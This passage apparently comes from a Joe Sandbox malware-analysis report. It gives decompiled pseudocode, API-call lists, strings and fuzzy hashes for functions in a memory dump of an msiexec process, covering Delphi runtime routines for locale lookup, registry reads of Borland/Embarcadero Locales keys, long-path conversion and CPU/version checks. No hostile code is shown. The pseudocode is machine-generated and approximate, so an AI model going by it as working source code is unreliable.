									_t43 = _t89 + 1;
									if(_t89 + 1 <= 0x105) {
										E049DCBE0( &_v1134, _v8, _t43);
										while( *_t115 != 0) {
											_t112 = E049DD198(_t115 + 2);
											_t50 = _t112 - _t115;
											_t51 = _t50 >> 1;
											if(_t50 < 0) {
												asm("adc eax, 0x0");
											}
											if(_t51 + _t89 + 1 <= 0x105) {
												_t55 =  &_v1134 + _t89 + _t89;
												_t101 = _t112 - _t115;
												_t102 = _t101 >> 1;
												if(_t101 < 0) {
													asm("adc edx, 0x0");
												}
												E049DCBE0(_t55, _t115, _t102 + 1);
												_v20 = FindFirstFileW( &_v1134,  &_v612);
												if(_v20 != 0xffffffff) {
													FindClose(_v20);
													if(lstrlenW( &(_v612.cFileName)) + _t89 + 1 + 1 <= 0x105) {
														 *((short*)(_t117 + _t89 * 2 - 0x46a)) = 0x5c;
														E049DCBE0( &_v1134 + _t89 + _t89 + 2,  &(_v612.cFileName), 0x105 - _t89 - 1);
														_t89 = _t89 + lstrlenW( &(_v612.cFileName)) + 1;
														_t115 = _t112;
														continue;
													}
												}
											}
											goto L24;
										}
										E049DCBE0(_v8,  &_v1134, _v12);
									}
								}
							}
						}
					}
				} else {
					_t90 = GetProcAddress(_t113, "GetLongPathNameW");
					if(_t90 == 0) {
						goto L4;
					} else {
						_push(0x105);
						_push( &_v1134);
						_push(_v8);
						if( *_t90() == 0) {
							goto L4;
						} else {
							E049DCBE0(_v8,  &_v1134, _v12);
						}
					}
				}
				L24:
				return _v16;
			}

0x049dd1c8
0x049dd1cb
0x049dd1d1
0x049dd1de
0x049dd1e2
0x049dd221
0x049dd228
0x049dd268
0x00000000
0x049dd22a
0x049dd232
0x049dd243
0x049dd249
0x049dd24f
0x049dd257
0x049dd25d
0x049dd26b
0x049dd26d
0x049dd270
0x049dd272
0x049dd274
0x049dd274
0x049dd277
0x049dd27f
0x049dd290
0x049dd357
0x049dd2a2
0x049dd2a6
0x049dd2a8
0x049dd2aa
0x049dd2ac
0x049dd2ac
0x049dd2b7
0x049dd2c7
0x049dd2cb
0x049dd2cd
0x049dd2cf
0x049dd2d1
0x049dd2d1
0x049dd2d7
0x049dd2ef
0x049dd2f6
0x049dd2fc
0x049dd318
0x049dd31a
0x049dd341
0x049dd353
0x049dd355
0x00000000
0x049dd355
0x049dd318
0x049dd2f6
0x00000000
0x049dd2b7
0x049dd36d
0x049dd36d
0x049dd27f
0x049dd25d
0x049dd249
0x049dd232
0x049dd1e4
0x049dd1ef
0x049dd1f3
0x00000000
0x049dd1f5
0x049dd1f5
0x049dd200
0x049dd204
0x049dd209
0x00000000
0x049dd20b
0x049dd217
0x049dd217
0x049dd209
0x049dd1f3
0x049dd372
0x049dd37b

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,049EF0B8,?,?), ref: 049DD1D9
GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 049DD1EA
FindFirstFileW.KERNEL32(?,?,kernel32.dll,049EF0B8,?,?), ref: 049DD2EA
FindClose.KERNEL32(?,?,?,kernel32.dll,049EF0B8,?,?), ref: 049DD2FC
lstrlenW.KERNEL32(?,?,?,?,kernel32.dll,049EF0B8,?,?), ref: 049DD308
lstrlenW.KERNEL32(?,?,?,?,?,kernel32.dll,049EF0B8,?,?), ref: 049DD34D

Strings

\, xrefs: 049DD31A
kernel32.dll, xrefs: 049DD1D4
GetLongPathNameW, xrefs: 049DD1E4

Memory Dump Source

Source File: 00000004.00000002.898496674.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true

Associated: 00000004.00000002.898412640.00000000049D0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899079253.0000000004C80000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899090087.0000000004C87000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899099871.0000000004C8B000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899109421.0000000004C8C000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899121700.0000000004C8E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899147930.0000000004C95000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899162929.0000000004C9A000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899179058.0000000004C9C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899187456.0000000004C9D000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899195944.0000000004C9F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_49d0000_msiexec.jbxd

Similarity

API ID: Findlstrlen$AddressCloseFileFirstHandleModuleProc
String ID: GetLongPathNameW$\$kernel32.dll
API String ID: 1930782624-3908791685
Opcode ID: 7519eceac3829b92193f9c10f4f6edf484cb7825f020b3310ce9bf6cd8be6cba
Instruction ID: 724069b527f353056e561d6e3ca89392c195997cf72f4b38e49e07eba57e890f
Opcode Fuzzy Hash: 7519eceac3829b92193f9c10f4f6edf484cb7825f020b3310ce9bf6cd8be6cba
Instruction Fuzzy Hash: B1419F75E00618ABEB10EEA8CC84ADDB3B9EF85314F14C6B58544E7250E778FE45CB41

Uniqueness

Uniqueness Score: -1.00%

Function 049DCD60, Relevance: 4.6, APIs: 3, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E049DCD60(signed short __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				short _v182;
				short _v352;
				char _v356;
				char _v360;
				char _v364;
				int _t58;
				signed int _t61;
				intOrPtr _t70;
				signed short _t80;
				void* _t83;
				void* _t85;
				void* _t86;

				_t77 = __edi;
				_push(__edi);
				_v356 = 0;
				_v360 = 0;
				_v364 = 0;
				_v8 = __edx;
				_t80 = __eax;
				_push(_t83);
				_push(0x49dcec5);
				_push( *[fs:eax]);
				 *[fs:eax] = _t83 + 0xfffffe98;
				E049D9F28(_v8);
				_t85 = _t80 -  *0x4c80a08; // 0x404
				if(_t85 >= 0) {
					_t86 = _t80 -  *0x4c80c08; // 0x7c68
					if(_t86 <= 0) {
						_t77 = 0x40;
						_v12 = 0;
						if(0x40 >= _v12) {
							do {
								_t61 = _t77 + _v12 >> 1;
								if(_t80 >=  *((intOrPtr*)(0x4c80a08 + _t61 * 8))) {
									__eflags = _t80 -  *((intOrPtr*)(0x4c80a08 + _t61 * 8));
									if(__eflags <= 0) {
										E049DCC80( *((intOrPtr*)(0x4c80a0c + _t61 * 8)), _t61, _v8, _t77, _t80, __eflags);
									} else {
										_v12 = _t61 + 1;
										goto L8;
									}
								} else {
									_t77 = _t61 - 1;
									goto L8;
								}
								goto L9;
								L8:
							} while (_t77 >= _v12);
						}
					}
				}
				L9:
				if( *_v8 == 0 && IsValidLocale(_t80 & 0x0000ffff, 2) != 0) {
					_t58 = _t80 & 0x0000ffff;
					GetLocaleInfoW(_t58, 0x59,  &_v182, 0x55);
					GetLocaleInfoW(_t58, 0x5a,  &_v352, 0x55);
					E049DAC88( &_v356, 0x55,  &_v182);
					_push(_v356);
					_push(0x49dcee0);
					E049DAC88( &_v360, 0x55,  &_v352);
					_push(_v360);
					_push(E049DCEF0);
					E049DAC88( &_v364, 0x55,  &_v182);
					_push(_v364);
					E049DAEC0(_v8, _t58, 5, _t77, _t80);
				}
				_pop(_t70);
				 *[fs:eax] = _t70;
				_push(E049DCECC);
				return E049D9F88( &_v364, 3);
			}

0x049dcd60
0x049dcd6b
0x049dcd6e
0x049dcd74
0x049dcd7a
0x049dcd80
0x049dcd83
0x049dcd87
0x049dcd88
0x049dcd8d
0x049dcd90
0x049dcd96
0x049dcd9b
0x049dcda2
0x049dcda4
0x049dcdab
0x049dcdad
0x049dcdb4
0x049dcdba
0x049dcdbc
0x049dcdc1
0x049dcdcb
0x049dcdd2
0x049dcdda
0x049dcdec
0x049dcddc
0x049dcddd
0x00000000
0x049dcddd
0x049dcdcd
0x049dcdcf
0x00000000
0x049dcdcf
0x00000000
0x049dcdf3
0x049dcdf3
0x049dcdbc
0x049dcdba
0x049dcdab
0x049dcdf8
0x049dcdfe
0x049dce22
0x049dce26
0x049dce37
0x049dce4d
0x049dce52
0x049dce58
0x049dce6e
0x049dce73
0x049dce79
0x049dce8f
0x049dce94
0x049dcea2
0x049dcea2
0x049dcea9
0x049dceac
0x049dceaf
0x049dcec4

APIs

IsValidLocale.KERNEL32(?,00000002,00000000,049DCEC5,?,049EF0B8,?,00000000), ref: 049DCE0A
GetLocaleInfoW.KERNEL32(00000000,00000059,?,00000055,?,00000002,00000000,049DCEC5,?,049EF0B8,?,00000000), ref: 049DCE26
GetLocaleInfoW.KERNEL32(00000000,0000005A,?,00000055,00000000,00000059,?,00000055,?,00000002,00000000,049DCEC5,?,049EF0B8,?,00000000), ref: 049DCE37

Memory Dump Source

Source File: 00000004.00000002.898496674.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true

Associated: 00000004.00000002.898412640.00000000049D0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899079253.0000000004C80000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899090087.0000000004C87000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899099871.0000000004C8B000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899109421.0000000004C8C000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899121700.0000000004C8E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899147930.0000000004C95000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899162929.0000000004C9A000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899179058.0000000004C9C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899187456.0000000004C9D000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899195944.0000000004C9F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_49d0000_msiexec.jbxd

Similarity

API ID: Locale$Info$Valid
String ID:
API String ID: 1826331170-0
Opcode ID: 2ac1190ee56cae3edb8b415285a208aa6275ea3487ecfb49120974895a4f902e
Instruction ID: 276e666c951fc0f195083e22a556f0153728b042acb9b3a5204a0eab8ce9fdb2
Opcode Fuzzy Hash: 2ac1190ee56cae3edb8b415285a208aa6275ea3487ecfb49120974895a4f902e
Instruction Fuzzy Hash: A631BC70A0021CABEB20DF64CC80BDE7BB9FB88701F1185B9A109A7240D6346E80DF21

Uniqueness

Uniqueness Score: -1.00%

Function 049DF7BC, Relevance: 1.5, APIs: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E049DF7BC() {
				signed int _t1;
				unsigned int _t3;
				signed int _t5;

				_t1 = GetVersion();
				_t5 = 0x000000ff & _t1;
				_t3 = (_t1 & 0x0000ff00) >> 8;
				if(0xff != 5 || _t3 < 1) {
					if(_t5 <= 5) {
						 *0x4c90988 = 0x409;
						return _t3;
					} else {
						goto L3;
					}
				} else {
					L3:
					 *0x4c90988 = 0x7f;
					return _t3;
				}
			}

0x049df7bc
0x049df7c6
0x049df7cd
0x049df7d3
0x049df7dd
0x049df7ea
0x049df7f4
0x00000000
0x00000000
0x00000000
0x049df7df
0x049df7df
0x049df7df
0x049df7e9
0x049df7e9

APIs

GetVersion.KERNEL32 ref: 049DF7BC

Memory Dump Source

Source File: 00000004.00000002.898496674.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true

Associated: 00000004.00000002.898412640.00000000049D0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899079253.0000000004C80000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899090087.0000000004C87000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899099871.0000000004C8B000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899109421.0000000004C8C000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899121700.0000000004C8E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899147930.0000000004C95000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899162929.0000000004C9A000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899179058.0000000004C9C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899187456.0000000004C9D000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899195944.0000000004C9F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_49d0000_msiexec.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 658fea03de4317b089224fbb10c360f22db34d7705895789bbc637580cb9777b
Instruction ID: fe57ac7bd7b8aecd42bea1ad16b93eabe103278ef88de3f0651048e83c14c641
Opcode Fuzzy Hash: 658fea03de4317b089224fbb10c360f22db34d7705895789bbc637580cb9777b
Instruction Fuzzy Hash: D4D0C77AD1150395FB204920DD863BD3195F3D1714FE5C475C2034AE4EE97C9CC55215

Uniqueness

Uniqueness Score: -1.00%

Function 049DBD20, Relevance: .1, Instructions: 64
COMMONCrypto

Download Yara Rule

C-Code - Quality: 53%

			E049DBD20(signed int __eax, signed int __edx, signed int _a4, signed int _a8) {
				signed int _v16;
				signed int _v20;
				signed int _t35;
				signed int _t39;
				signed int _t46;
				signed int _t50;
				signed int _t51;
				signed int _t56;
				signed int _t68;
				signed int _t72;
				signed int _t73;
				void* _t74;

				_t50 = _a8;
				_t72 = __edx >> 0x1f;
				_t56 = __edx ^ _t72;
				_t35 = (__eax ^ _t72) - _t72;
				asm("sbb edx, esi");
				_t68 = _t50 >> 0x1f;
				_t73 = _t72 ^ _t68;
				_t51 = _t50 ^ _t68;
				_t46 = (_a4 ^ _t68) - _t68;
				asm("sbb ecx, edi");
				if(_t46 != 0) {
					 *(_t74 - 0xc) = _t35;
					_v20 = _t46;
					_v16 = _t56;
					asm("rcr eax, 1");
					asm("ror edi, 1");
					asm("rcr ebx, 1");
					asm("bsr ecx, ecx");
					asm("rol edi, 1");
					_t39 = ((_t56 >> 0x00000001 << 0x00000020 | _t35) >> _t51) / ((_t51 << 0x00000020 | _t46) >> _t51);
					asm("sbb ecx, edx");
					asm("sbb eax, 0x0");
				} else {
					if(_t56 >= _t46) {
						_t51 = _t56 / _t46;
					}
					_t39 = _t35 / _t46;
				}
				asm("sbb edx, esi");
				return (_t39 ^ _t73) - _t73;
			}

0x049dbd27
0x049dbd2f
0x049dbd34
0x049dbd36
0x049dbd38
0x049dbd3a
0x049dbd3d
0x049dbd41
0x049dbd43
0x049dbd45
0x049dbd47
0x049dbd5f
0x049dbd62
0x049dbd66
0x049dbd6e
0x049dbd70
0x049dbd72
0x049dbd74
0x049dbd7f
0x049dbd93
0x049dbd99
0x049dbd9b
0x049dbd49
0x049dbd4b
0x049dbd55
0x049dbd55
0x049dbd56
0x049dbd58
0x049dbda9
0x049dbdae

Memory Dump Source

Source File: 00000004.00000002.898496674.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true

Associated: 00000004.00000002.898412640.00000000049D0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899079253.0000000004C80000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899090087.0000000004C87000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899099871.0000000004C8B000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899109421.0000000004C8C000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899121700.0000000004C8E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899147930.0000000004C95000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899162929.0000000004C9A000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899179058.0000000004C9C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899187456.0000000004C9D000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899195944.0000000004C9F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_49d0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d17ffc1b7c175c9f3f133bcf490b3ef334a0cf6f2a578ee1034f9dfeca47056c
Instruction ID: 1a147977206db445a58f68a3efbcfe2520159fdccc2d4b4da251dea7391c9825
Opcode Fuzzy Hash: d17ffc1b7c175c9f3f133bcf490b3ef334a0cf6f2a578ee1034f9dfeca47056c
Instruction Fuzzy Hash: B601D672B013110B874CDD3ECD8862AB6D7ABD8910F0AC63D9589C72C4DD319C1AC682

Uniqueness

Uniqueness Score: -1.00%

Function 049D7CA4, Relevance: .0, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E049D7CA4(intOrPtr __eax, intOrPtr __edx) {
				intOrPtr _t5;
				intOrPtr* _t6;
				intOrPtr* _t9;

				_t9 = _t6;
				asm("cpuid");
				 *_t9 = __eax;
				 *((intOrPtr*)(_t9 + 4)) = _t5;
				 *((intOrPtr*)(_t9 + 8)) = __edx;
				 *((intOrPtr*)(_t9 + 0xc)) = __edx;
				return __eax;
			}

0x049d7ca7
0x049d7cab
0x049d7cad
0x049d7caf
0x049d7cb2
0x049d7cb5
0x049d7cbb

Memory Dump Source

Source File: 00000004.00000002.898496674.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true

Associated: 00000004.00000002.898412640.00000000049D0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899079253.0000000004C80000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899090087.0000000004C87000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899099871.0000000004C8B000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899109421.0000000004C8C000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899121700.0000000004C8E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899147930.0000000004C95000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899162929.0000000004C9A000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899179058.0000000004C9C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899187456.0000000004C9D000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899195944.0000000004C9F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_49d0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f1654813ed5821a00b8b7144780f614f73eea8c4dc557e3c0d17b55d1bda45a
Instruction ID: c1f34be03cf0569538104f0038f02cfb84df381903d0011f2ebedd3a3241928c
Opcode Fuzzy Hash: 1f1654813ed5821a00b8b7144780f614f73eea8c4dc557e3c0d17b55d1bda45a
Instruction Fuzzy Hash: 76C0E9B550D6066E975C8F1AB480815FBE5FAC8324364C22EA01C83644D73154518A64

Uniqueness

Uniqueness Score: -1.00%

Function 049DD3AC, Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 173
registryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E049DD3AC(char __eax, void* __ebx, void* __ecx, void* __edx) {
				char _v8;
				char* _v12;
				void* _v16;
				int _v20;
				short _v542;
				void* _t97;
				intOrPtr _t106;
				intOrPtr _t108;
				void* _t112;
				void* _t113;
				intOrPtr _t114;

				_t112 = _t113;
				_t114 = _t113 + 0xfffffde4;
				_t97 = __edx;
				_v8 = __eax;
				E049DA00C(_v8);
				_push(_t112);
				_push(0x49dd5d1);
				_push( *[fs:eax]);
				 *[fs:eax] = _t114;
				if(_v8 != 0) {
					E049DCBE0( &_v542, E049DABD0(_v8), 0x105);
				} else {
					GetModuleFileNameW(0,  &_v542, 0x105);
				}
				if(_v542 == 0) {
					L18:
					_pop(_t106);
					 *[fs:eax] = _t106;
					_push(E049DD5D8);
					return E049D9F28( &_v8);
				} else {
					_v12 = 0;
					if(RegOpenKeyExW(0x80000001, L"Software\\Embarcadero\\Locales", 0, 0xf0019,  &_v16) == 0 || RegOpenKeyExW(0x80000002, L"Software\\Embarcadero\\Locales", 0, 0xf0019,  &_v16) == 0 || RegOpenKeyExW(0x80000001, L"Software\\CodeGear\\Locales", 0, 0xf0019,  &_v16) == 0 || RegOpenKeyExW(0x80000002, L"Software\\CodeGear\\Locales", 0, 0xf0019,  &_v16) == 0 || RegOpenKeyExW(0x80000001, L"Software\\Borland\\Locales", 0, 0xf0019,  &_v16) == 0 || RegOpenKeyExW(0x80000001, L"Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v16) == 0) {
						_push(_t112);
						_push(0x49dd5b4);
						_push( *[fs:eax]);
						 *[fs:eax] = _t114;
						E049DD1BC( &_v542, 0x105);
						if(RegQueryValueExW(_v16,  &_v542, 0, 0, 0,  &_v20) != 0) {
							if(RegQueryValueExW(_v16, E049DD6C4, 0, 0, 0,  &_v20) == 0) {
								_v12 = E049D6EB8(_v20);
								RegQueryValueExW(_v16, E049DD6C4, 0, 0, _v12,  &_v20);
								E049DAC34(_t97, _v12);
							}
						} else {
							_v12 = E049D6EB8(_v20);
							RegQueryValueExW(_v16,  &_v542, 0, 0, _v12,  &_v20);
							E049DAC34(_t97, _v12);
						}
						_pop(_t108);
						 *[fs:eax] = _t108;
						_push(E049DD5BB);
						if(_v12 != 0) {
							E049D6ED4(_v12);
						}
						return RegCloseKey(_v16);
					} else {
						goto L18;
					}
				}
			}

0x049dd3ad
0x049dd3af
0x049dd3b6
0x049dd3b8
0x049dd3be
0x049dd3c5
0x049dd3c6
0x049dd3cb
0x049dd3ce
0x049dd3d5
0x049dd401
0x049dd3d7
0x049dd3e5
0x049dd3e5
0x049dd40e
0x049dd5bb
0x049dd5bd
0x049dd5c0
0x049dd5c3
0x049dd5d0
0x049dd414
0x049dd416
0x049dd435
0x049dd4d7
0x049dd4d8
0x049dd4dd
0x049dd4e0
0x049dd4ee
0x049dd50f
0x049dd55e
0x049dd568
0x049dd580
0x049dd58a
0x049dd58a
0x049dd511
0x049dd519
0x049dd533
0x049dd53d
0x049dd53d
0x049dd591
0x049dd594
0x049dd597
0x049dd5a0
0x049dd5a5
0x049dd5a5
0x049dd5b3
0x00000000
0x00000000
0x00000000
0x049dd435

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,049DD5D1,?,?), ref: 049DD3E5
RegOpenKeyExW.ADVAPI32(80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,049DD5D1,?,?), ref: 049DD42E
RegOpenKeyExW.ADVAPI32(80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,049DD5D1,?,?), ref: 049DD450
RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000), ref: 049DD46E
RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001), ref: 049DD48C
RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002), ref: 049DD4AA
RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 049DD4C8
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,049DD5B4,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,049DD5D1), ref: 049DD508
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,049DD5B4,?,80000001), ref: 049DD533
RegCloseKey.ADVAPI32(?,049DD5BB,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,049DD5B4,?,80000001,Software\Embarcadero\Locales), ref: 049DD5AE

Strings

Software\Borland\Delphi\Locales, xrefs: 049DD4BE
Software\Borland\Locales, xrefs: 049DD4A0
Software\CodeGear\Locales, xrefs: 049DD464, 049DD482
Software\Embarcadero\Locales, xrefs: 049DD424, 049DD446

Memory Dump Source

Source File: 00000004.00000002.898496674.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true

Associated: 00000004.00000002.898412640.00000000049D0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899079253.0000000004C80000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899090087.0000000004C87000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899099871.0000000004C8B000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899109421.0000000004C8C000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899121700.0000000004C8E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899147930.0000000004C95000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899162929.0000000004C9A000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899179058.0000000004C9C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899187456.0000000004C9D000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899195944.0000000004C9F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_49d0000_msiexec.jbxd

Similarity

API ID: Open$QueryValue$CloseFileModuleName
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
API String ID: 2701450724-3496071916
Opcode ID: 19bdda5ef53ff40748f19f15df3d7a77bfbdc78c471bccba88ef61d1a8d50458
Instruction ID: 4e879efade00cfc98096fc1c5f7c92bab7fecc3d9660413c8bb40ae2168fb436
Opcode Fuzzy Hash: 19bdda5ef53ff40748f19f15df3d7a77bfbdc78c471bccba88ef61d1a8d50458
Instruction Fuzzy Hash: 03512175A4020CBFFB10EFA4CC41FAE73ACEB89718F518575BA04F6185D6B4BA448B54

Uniqueness

Uniqueness Score: -1.00%

Function 049DD078, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E049DD078(signed short __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				char _v8;
				void* _t18;
				signed short _t28;
				intOrPtr _t35;
				intOrPtr* _t44;
				intOrPtr _t47;

				_t42 = __edi;
				_push(0);
				_push(__ebx);
				_push(__esi);
				_t44 = __edx;
				_t28 = __eax;
				_push(_t47);
				_push(0x49dd17c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t47;
				EnterCriticalSection(0x4c92c14);
				if(_t28 !=  *0x4c92c2c) {
					LeaveCriticalSection(0x4c92c14);
					E049D9F28(_t44);
					if(IsValidLocale(_t28 & 0x0000ffff, 2) != 0) {
						if( *0x4c92c10 == 0) {
							_t18 = E049DCD60(_t28, _t28, _t44, __edi, _t44);
							L049D51E4();
							if(_t28 != _t18) {
								if( *_t44 != 0) {
									_t18 = E049DADE0(_t44, E049DD194);
								}
								L049D51E4();
								E049DCD60(_t18, _t28,  &_v8, _t42, _t44);
								E049DADE0(_t44, _v8);
							}
						} else {
							E049DCF5C(_t28, _t44);
						}
					}
					EnterCriticalSection(0x4c92c14);
					 *0x4c92c2c = _t28;
					E049DCBE0(0x4c92c2e, E049DABD0( *_t44), 0xaa);
					LeaveCriticalSection(0x4c92c14);
				} else {
					E049DAC88(_t44, 0x55, 0x4c92c2e);
					LeaveCriticalSection(0x4c92c14);
				}
				_pop(_t35);
				 *[fs:eax] = _t35;
				_push(E049DD183);
				return E049D9F28( &_v8);
			}

0x049dd078
0x049dd07b
0x049dd07d
0x049dd07e
0x049dd07f
0x049dd081
0x049dd085
0x049dd086
0x049dd08b
0x049dd08e
0x049dd096
0x049dd0a2
0x049dd0c9
0x049dd0d0
0x049dd0e2
0x049dd0eb
0x049dd0fc
0x049dd101
0x049dd109
0x049dd10e
0x049dd117
0x049dd117
0x049dd11c
0x049dd124
0x049dd12e
0x049dd12e
0x049dd0ed
0x049dd0f1
0x049dd0f1
0x049dd0eb
0x049dd138
0x049dd13d
0x049dd157
0x049dd161
0x049dd0a4
0x049dd0b0
0x049dd0ba
0x049dd0ba
0x049dd168
0x049dd16b
0x049dd16e
0x049dd17b

APIs

EnterCriticalSection.KERNEL32(04C92C14,00000000,049DD17C,?,?,?,00000000,?,049DDA5C,00000000,049DDABB,?,?,00000000,00000000,00000000), ref: 049DD096
LeaveCriticalSection.KERNEL32(04C92C14,04C92C14,00000000,049DD17C,?,?,?,00000000,?,049DDA5C,00000000,049DDABB,?,?,00000000,00000000), ref: 049DD0BA
LeaveCriticalSection.KERNEL32(04C92C14,04C92C14,00000000,049DD17C,?,?,?,00000000,?,049DDA5C,00000000,049DDABB,?,?,00000000,00000000), ref: 049DD0C9
IsValidLocale.KERNEL32(00000000,00000002,04C92C14,04C92C14,00000000,049DD17C,?,?,?,00000000,?,049DDA5C,00000000,049DDABB), ref: 049DD0DB
EnterCriticalSection.KERNEL32(04C92C14,00000000,00000002,04C92C14,04C92C14,00000000,049DD17C,?,?,?,00000000,?,049DDA5C,00000000,049DDABB), ref: 049DD138
LeaveCriticalSection.KERNEL32(04C92C14,04C92C14,00000000,00000002,04C92C14,04C92C14,00000000,049DD17C,?,?,?,00000000,?,049DDA5C,00000000,049DDABB), ref: 049DD161

Strings

en-US,en,, xrefs: 049DD0A6, 049DD14D

Memory Dump Source

Source File: 00000004.00000002.898496674.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true

Associated: 00000004.00000002.898412640.00000000049D0000.00000002.00020000.sdmp Download File
